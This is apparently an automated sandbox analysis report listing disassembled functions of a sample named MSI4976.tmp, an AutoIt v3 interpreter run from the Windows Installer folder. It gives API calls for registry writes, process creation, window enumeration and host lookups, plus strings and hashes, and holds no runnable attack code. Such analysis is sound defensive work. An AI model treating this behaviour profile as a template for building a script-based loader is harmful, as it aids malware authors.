                                          • Part of subcall function 0034F84C: __dosmaperr.LIBCMT ref: 0034F8D5
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • __lseeki64_nolock.LIBCMT ref: 00356FBD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003570F2
                                        • ___createFile.LIBCMT ref: 00357111
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0035711E
                                        • __dosmaperr.LIBCMT ref: 00357125
                                        • __free_osfhnd.LIBCMT ref: 00357145
                                        • __invoke_watson.LIBCMT ref: 00357173
                                        • __wsopen_helper.LIBCMT ref: 0035718D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                        • String ID: 9A4$@
                                        • API String ID: 3896587723-3991797704
                                        • Opcode ID: b3fe8b007e47677edef97e974497dee1e3546e12912125ff4a145192e222a231
                                        • Instruction ID: 00224f5a1ad0ef58af188bc72b60227df933ba8965b24a790abdcf9e28c3f013
                                        • Opcode Fuzzy Hash: b3fe8b007e47677edef97e974497dee1e3546e12912125ff4a145192e222a231
                                        • Instruction Fuzzy Hash: 912214719041059BEF279F68DC93FAE7BA5EB01321F654229ED21AB2F2C7358D48C790

                                        Control-flow Graph

                                        APIs
                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 003676ED
                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00367713
                                        • _wcscpy.LIBCMT ref: 00367741
                                        • _wcscmp.LIBCMT ref: 0036774C
                                        • _wcscat.LIBCMT ref: 00367762
                                        • _wcsstr.LIBCMT ref: 0036776D
                                        • 75381560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00367789
                                        • _wcscat.LIBCMT ref: 003677D2
                                        • _wcscat.LIBCMT ref: 003677D9
                                        • _wcsncpy.LIBCMT ref: 00367804
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat$FileInfoVersion$75381560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 2589663703-1459072770
                                        • Opcode ID: 3c507daf2b8e5319f6ad273e3d2ea03c1f128f49a5a34d662c482f08811af447
                                        • Instruction ID: f3d6914ef96bbded59a1e6f6103123eaaac7ed8e19118011c1eba8db21cab43e
                                        • Opcode Fuzzy Hash: 3c507daf2b8e5319f6ad273e3d2ea03c1f128f49a5a34d662c482f08811af447
                                        • Instruction Fuzzy Hash: 1841F272A042007AE707AB649C87EFF7BECDF15714F40405AF900AF592EB75AA4086A1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        • Control-flow graph of the function at 321f04 (rendered graph edge list omitted; API calls on graph nodes: GetForegroundWindow, CharUpperBuffW, EnumWindows, GetDesktopWindow, EnumChildWindows, IsWindow)
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • GetForegroundWindow.USER32 ref: 00321FBE
                                        • IsWindow.USER32(?), ref: 0039282E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Foreground_memmove
                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                        • API String ID: 3828923867-1919597938
                                        • Opcode ID: 3032ccc6864eb6a7d1ce203b1388ea1ee6a1fabfd2e92d13c5fc1eb9f35c8570
                                        • Instruction ID: d48903000f2b8ced43eab9c0fcb9cd31b6e52cfeb1fa8dbadc3f89c060022704
                                        • Opcode Fuzzy Hash: 3032ccc6864eb6a7d1ce203b1388ea1ee6a1fabfd2e92d13c5fc1eb9f35c8570
                                        • Instruction Fuzzy Hash: 5DD1E830508B02FFCF0BEF20D480AABB7A5BF54344F544A29F4565B5A2DB30E959CB92

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        • Control-flow graph of the function at 38352a (rendered graph edge list omitted; API calls on graph nodes: RegConnectRegistryW, RegCreateKeyExW, RegCloseKey, RegSetValueExW)
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00383626
                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,003BDBF0,00000000,?,00000000,?,?), ref: 00383694
                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003836DC
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00383765
                                        • RegCloseKey.ADVAPI32(?), ref: 00383A85
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00383A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Close$ConnectCreateRegistryValue
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 536824911-966354055
                                        • Opcode ID: d420f7a519b81139b855738e2c43813ecbbeddd885ad9d0c9b8387e8d1c4c2da
                                        • Instruction ID: 853f4d146d5fb86994823819cecd83cfaabc5e8e371eae40e0fa1014dc52ef68
                                        • Opcode Fuzzy Hash: d420f7a519b81139b855738e2c43813ecbbeddd885ad9d0c9b8387e8d1c4c2da
                                        • Instruction Fuzzy Hash: 5B0248752006119FCB16EF29D891E6AB7E9FF89720F05845DF88A9B362DB34ED01CB41

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0033EA39
                                        • __wsplitpath.LIBCMT ref: 0033EA56
                                          • Part of subcall function 0034297D: __wsplitpath_helper.LIBCMT ref: 003429BD
                                        • _wcsncat.LIBCMT ref: 0033EA69
                                        • __makepath.LIBCMT ref: 0033EA85
                                          • Part of subcall function 00342BFF: __wmakepath_s.LIBCMT ref: 00342C13
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                        • _wcscpy.LIBCMT ref: 0033EABE
                                          • Part of subcall function 0033EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0033EADA,?,?), ref: 0033EB27
                                        • _wcscat.LIBCMT ref: 003932FC
                                        • _wcscat.LIBCMT ref: 00393334
                                        • _wcsncpy.LIBCMT ref: 00393370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                        • String ID: '/6$Include$\$">
                                        • API String ID: 1213536620-634662058
                                        • Opcode ID: de659a071c4c113b5a2d8d4e56e7c1877e81afb2f101c32491b48f095db8f20b
                                        • Instruction ID: 0b1585c8b297544de818831a5727f4a24f152fa98d03352ce86c4fd3e7f73e87
                                        • Opcode Fuzzy Hash: de659a071c4c113b5a2d8d4e56e7c1877e81afb2f101c32491b48f095db8f20b
                                        • Instruction Fuzzy Hash: 0951E9BA4043809BC727EF55E8C589BB7ECFB49300F404A1EF5459B2A1EB74A644CF66

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI4976.tmp,00000104,?,00000000,00000001,00000000), ref: 0032428C
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00341BC7: __wcsicmp_l.LIBCMT ref: 00341C50
                                        • _wcscpy.LIBCMT ref: 003243C0
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI4976.tmp,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0039214E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Windows\Installer\MSI4976.tmp$CMDLINE$CMDLINERAW
                                        • API String ID: 861526374-1219366996
                                        • Opcode ID: 4aaedad4b522fe36ad3273a3993afdb47dc77a7e160940dda307b584e9ce3834
                                        • Instruction ID: 3c608fac454ddb689be5f640689a39412dffda541a1a34a04a9e3ea5b36ebdb7
                                        • Opcode Fuzzy Hash: 4aaedad4b522fe36ad3273a3993afdb47dc77a7e160940dda307b584e9ce3834
                                        • Instruction Fuzzy Hash: C5817376900529AACB17EBE1ED92EEFB7BCAF15350F500115F541BB081EB706B44CBA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        • Control-flow graph of the function at 3678ee (rendered graph edge list omitted; API calls on graph nodes: WSAStartup, gethostname, gethostbyname, inet_ntoa, WSACleanup)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 208665112-3771769585
                                        • Opcode ID: eaddce9a6a87340e1a35a068f91492d6fd9acd62a709c882c35e3d1ef0f0a070
                                        • Instruction ID: e10960462a1b9f4c7d359b78c5bb4735b7a09de22690f58684e75e372952d018
                                        • Opcode Fuzzy Hash: eaddce9a6a87340e1a35a068f91492d6fd9acd62a709c882c35e3d1ef0f0a070
                                        • Instruction Fuzzy Hash: BF112431908115AFDB27AB70DC4AEEA73FCDF06724F4040A5F0069A094EF70DA808BA0

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 003230B0
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 003230BF
                                        • LoadIconW.USER32(00000063), ref: 003230D5
                                        • LoadIconW.USER32(000000A4), ref: 003230E7
                                        • LoadIconW.USER32(000000A2), ref: 003230F9
                                          • Part of subcall function 0032318A: LoadImageW.USER32(00320000,00000063,00000001,00000010,00000010,00000000), ref: 003231AE
                                        • RegisterClassExW.USER32(?), ref: 00323167
                                          • Part of subcall function 00322F58: GetSysColorBrush.USER32(0000000F), ref: 00322F8B
                                          • Part of subcall function 00322F58: RegisterClassExW.USER32(00000030), ref: 00322FB5
                                          • Part of subcall function 00322F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00322FC6
                                          • Part of subcall function 00322F58: LoadIconW.USER32(000000A9), ref: 00323009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 2880975755-4155596026
                                        • Opcode ID: 278c6081dbc08d743a4342056a6bd59ceaf4eaaec31ddaeb30b31580ee0eb12c
                                        • Instruction ID: d8d7584951133bbf913a3c93a706de5e9e2ab0be0f3c23ee49ec0bb361d51dd7
                                        • Opcode Fuzzy Hash: 278c6081dbc08d743a4342056a6bd59ceaf4eaaec31ddaeb30b31580ee0eb12c
                                        • Instruction Fuzzy Hash: A2214474E00354AFDB56DFA9EC85A9EBFF9FB48314F00422AE614AB2E0D77545408F91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        • Control-flow graph of the function at 37b74b (rendered graph edge list omitted; API calls on graph nodes: VariantInit, CoInitialize, CoUninitialize, GetRunningObjectTable, SetErrorMode, CoGetInstanceFromFile, CoGetObject, VariantClear)
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 0037B777
                                        • CoInitialize.OLE32(00000000), ref: 0037B7A4
                                        • CoUninitialize.COMBASE ref: 0037B7AE
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0037B8AE
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0037B9DB
                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0037BA0F
                                        • CoGetObject.OLE32(?,00000000,003AD91C,?), ref: 0037BA32
                                        • SetErrorMode.KERNEL32(00000000), ref: 0037BA45
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0037BAC5
                                        • VariantClear.OLEAUT32(003AD91C), ref: 0037BAD5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                        • String ID:
                                        • API String ID: 2395222682-0
                                        • Opcode ID: c4a6527459041fad65c014009f15c4ca134a45b71cc6c7ceae8b2553abb25dd7
                                        • Instruction ID: 0609cd7313e929aa502e2de229be265c7f578751f33c962fc861d490f798bf70
                                        • Opcode Fuzzy Hash: c4a6527459041fad65c014009f15c4ca134a45b71cc6c7ceae8b2553abb25dd7
                                        • Instruction Fuzzy Hash: CEC12371604345AFC711EF68C884A6BB7E9FF89304F00891DF98A9B251DB75ED05CB52

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00322F8B
                                        • RegisterClassExW.USER32(00000030), ref: 00322FB5
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00322FC6
                                        • LoadIconW.USER32(000000A9), ref: 00323009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: f567803a90d043ec7db9f35dd125873813079c8b59ab1e056caee9ae003655fa
                                        • Instruction ID: 129212f95808e228b57ebe4b435496ec307186029eac756d18747569c8af1020
                                        • Opcode Fuzzy Hash: f567803a90d043ec7db9f35dd125873813079c8b59ab1e056caee9ae003655fa
                                        • Instruction Fuzzy Hash: E621C4B5900358AFDB12DFA4E889BCEBBF8FB09704F00421AF615AA6A0D7B14544CF91

                                        Control-flow Graph

                                        APIs
                                        • _memset.LIBCMT ref: 003823E6
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00382579
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038259D
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003825DD
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003825FF
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00382760
                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00382792
                                        • CloseHandle.KERNEL32(?), ref: 003827C1
                                        • CloseHandle.KERNEL32(?), ref: 00382838
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                        • String ID:
                                        • API String ID: 4090791747-0
                                        • Opcode ID: 0956fe54a6d03538fbdc86b3a32f4bb0ec954244d43a9c1c9851ac84f2727b74
                                        • Instruction ID: b6dfe901d86f0d829bbb68f44c2d0e41c3624e9454278e5d22c8ab2fb1eef46b
                                        • Opcode Fuzzy Hash: 0956fe54a6d03538fbdc86b3a32f4bb0ec954244d43a9c1c9851ac84f2727b74
                                        • Instruction Fuzzy Hash: E0D1A035604301DFCB16EF25D891B6ABBE5AF85310F15889DF8899F2A2DB70EC41CB52

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: 19385a54923d97f54e4f70e7748cce87194c7eae7cc5b276d693f1be2f398ff4
                                        • Instruction ID: 916198092bb41541536a5494b9cb761a8bd9995b139c1fd56254e0e389fcbd0f
                                        • Opcode Fuzzy Hash: 19385a54923d97f54e4f70e7748cce87194c7eae7cc5b276d693f1be2f398ff4
                                        • Instruction Fuzzy Hash: 17E1B171A1021AAFDF22DFA4D881AEE77B9FF48314F15802DF949AB281D7749D41CB90

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$_memset
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2862541840-625585964
                                        • Opcode ID: 323b0df2f94de50a192a94e73dd97d3cf85624f8667bd9adb6f847dd545afc7e
                                        • Instruction ID: 0eb6422d2d3795ca302242483d736d17e86a08e6a8f549386a4a49f0a4fa4ec4
                                        • Opcode Fuzzy Hash: 323b0df2f94de50a192a94e73dd97d3cf85624f8667bd9adb6f847dd545afc7e
                                        • Instruction Fuzzy Hash: E291AD71A10219EBDF26CFA4D844FAEBBB8EF45710F10852DF919AB281D7749941CFA0
                                        APIs
                                          • Part of subcall function 00323F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003234E2,?,00000001), ref: 00323FCD
                                        • _free.LIBCMT ref: 00393C27
                                        • _free.LIBCMT ref: 00393C6E
                                          • Part of subcall function 0032BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,003E22E8,?,00000000,?,00323E2E,?,00000000,?,003BDBF0,00000000,?), ref: 0032BE8B
                                          • Part of subcall function 0032BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00323E2E,?,00000000,?,003BDBF0,00000000,?,00000002), ref: 0032BEA7
                                          • Part of subcall function 0032BDF0: __wsplitpath.LIBCMT ref: 0032BF19
                                          • Part of subcall function 0032BDF0: _wcscpy.LIBCMT ref: 0032BF31
